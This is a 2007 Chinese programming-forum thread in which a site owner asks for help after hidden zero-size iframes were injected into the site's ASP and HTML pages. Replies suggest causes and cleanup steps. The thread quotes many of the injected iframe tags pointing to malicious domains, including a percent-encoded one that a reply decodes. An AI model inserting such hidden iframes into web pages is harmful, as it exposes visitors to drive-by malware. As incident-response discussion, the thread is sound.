您的位置:程序门 -> web 开发 -> asp



网站中毒了,那位高手能指导?


[收藏此页] [打印本页]选择字色:背景色:字体:[][][]


网站中毒了,那位高手能指导?[已结贴,结贴人:hhdl0471]
发表于:2007-03-15 08:08:03 楼主
我的一个网站中毒了,每次打开主页面的时候在ie浏览器的下面都会显示“正在打开网页http://kenng.512j.com/index.htm”一个陌生的网址,我查看源文件的时候看见生成的html中又这样的几段程序,没有见过:
<iframe   src= "http://kenng.512j.com/index.htm "   width= "0 "   height= "0 "   frameborder= "0 "> </iframe>
<iframe   border= "0 "   framespacing= "0 "   frameborder= "0 "   scrolling= "no "   width= "0 "   height= "0 "   src= "http://www.zeav.cn/xhtml/20062145.html "> </iframe>
我查看我的asp源程序中并没有,很是奇怪,而且在打开主页面的时候金山毒霸报毒!不知道怎么处理!
发表于:2007-03-15 08:13:541楼 得分:0
我觉的有三种可能:
一是服务器中毒了,会感染所有的html文件
二是被别人入侵了,asp木马中有个批量挂马的功能(可能性比较大)
三是asp主文件被改了,可能被别人加了一段向每个html文件插入恶意代码的功能
发表于:2007-03-15 08:21:092楼 得分:0
那要是第二种可能的话我应该怎么办呢?
我在我的asp源程序中找不见木马的跳转语句!
发表于:2007-03-15 08:32:473楼 得分:0
解决办法就是杀毒啊,那病毒很容易就搞定了,或者你看看最新的文件或者最新的被改动过的文件,发现可疑之处就删掉,从这http://kenng.512j.com/index.htm地址来看,这肯定是个小黑所为
发表于:2007-03-15 08:45:044楼 得分:5
用李俊的熊猫烧香专杀工具就可以.
发表于:2007-03-15 08:45:375楼 得分:0
由于我这几天看源程序,从最新的文件或者最新的被改动过的文件这个方法可能性不大了!我看我的源程序,没有发现特别可疑的地方!就default.asp中有:
<iframe   src= "http://www.660083.com/qq/2.htm "   width=0   height=0> </iframe> <iframe   src= "http://www.660083.com/qq/2.htm "   width=0   height=0> </iframe> <iframe   src= "http://ll78.com/qq/2.htm "   width=0   height=0> </iframe> <iframe   src= "http://ll78.com/qq/2.htm "   width=0   height=0> </iframe> <iframe   src= "http://ll78.com/qq/2.htm "   width=0   height=0> </iframe> <iframe   src= "http://ll78.com/qq/2.htm "   width=0   height=0> </iframe> <iframe   src= 'http://www.yxgm78.com/mh/zk.htm '   width= '0 '   height= '0 '   scrolling= 'no '   frameborder= '0 '> </iframe> <iframe   src= 'http://zkwwb.135.tofor.com/zk.htm '   width= '0 '   height= '0 '   scrolling= 'no '   frameborder= '0 '> </iframe> <iframe   src= "http://mayir.yxgm78.com/ "   width= "0 "   height= "0 "   border= "0 "> </iframe> <iframe   src= "http://www.gansf.com/116.htm "   windth=0   height=0> </iframe> <iframe   src= "http://24sm.hz79.oaooao.com/wm/coin.htm "   width= "0 "   height= "0 "   scrolling= "no "frameborder= "0 "> </iframe>  

<iframe   src= "http://ad.13591.com/new/banars.htm "   width= "0 "   height= "0 "   frameborder= "0 "> </iframe>    
可是我删除了这段程序,还是没有什么用!麻烦你能指点一下我应该怎么做??
而且我发现它的这个跳转的地方不是一个网址!而且在生成的html中 <iframe= " "> </iframe> 有好多处!
发表于:2007-03-15 08:50:556楼 得分:10
网页挂马其实有多种方式实现,并不表示一定要是iframe。

首先请问你的是自己服务器还是买的虚拟主机服务?
如果是虚拟主机的话,先将自己的所有代码拷贝到本机,对所有文件进行“.js”, "512j ", "http "三个关键字进行搜索,查找包含有这3个关键字的文件(可用一些文本查找工具,或dw也行,windows自带的search有时是找不出来特定关键字的,所以不推荐)。

如果还没找到,那么只能假定是iis或服务器中毒的话,你也爱莫能助,联系管理员吧。


假设是自己服务器的话,请检查服务器安全,比如是否多出了管理员,iis设置上是否有设置文档页脚来挂马,并打好服务器的windows安全补丁,用杀毒软件进行全盘查杀试试。


仅供参考吧,具体情况灵活运用。
发表于:2007-03-15 08:51:147楼 得分:0
汗```网站肯定有漏洞,被别人入侵过了
能告诉你的网站不,我也去看看,看看有什么漏洞
发表于:2007-03-15 08:52:318楼 得分:5
还可以看看文档的修改时间,一般你自己的源码多久修改的应该知道个大概吧?修改时间可疑的都看看
发表于:2007-03-15 08:54:319楼 得分:0
网址为:http://www.hjnyz.com/team/default.asp
我从网上服务器上下载下来程序在我的本机上调试,还是有毒!
发表于:2007-03-15 09:00:5710楼 得分:30
<iframe   src= "http://%79%6a%70%73%32%30%30%38%2e%33%33%32%32%2e%6f%72%67/%76%69%70%2e%68%74%6d "   width= "0 "   height= "0 "   border= "0 "> </iframe>
这个你删了吗?   经过加密的   解密后的代码是; <iframe   src= "http://yjps2008.3322.org/vip.htm "   width= "0 "   height= "0 "   border= "0 "> </iframe>
还有   你的网站有严重的漏洞,用不了5分钟就被别人搞定了
但是漏洞不能在这说...说出来更麻烦
发表于:2007-03-15 09:04:0811楼 得分:0
那能不能加你qq呢?
我的qq是:416162356
麻烦你了!
发表于:2007-03-15 09:34:2112楼 得分:0
<iframe   src= "http://%79%6a%70%73%32%30%30%38%2e%33%33%32%32%2e%6f%72%67/%76%69%70%2e%68%74%6d "   width= "0 "   height= "0 "   border= "0 "> </iframe>

<iframe   src= "http://kenng.512j.com/index.htm "   width= "0 "   height= "0 "   frameborder= "0 "> </iframe>
</html>

两个都删除了吧
发表于:2007-03-15 10:32:4813楼 得分:0
是中毒了
杀毒

相关文章
其他资讯

快速检索
分类导航标签a

最新资讯
热门点击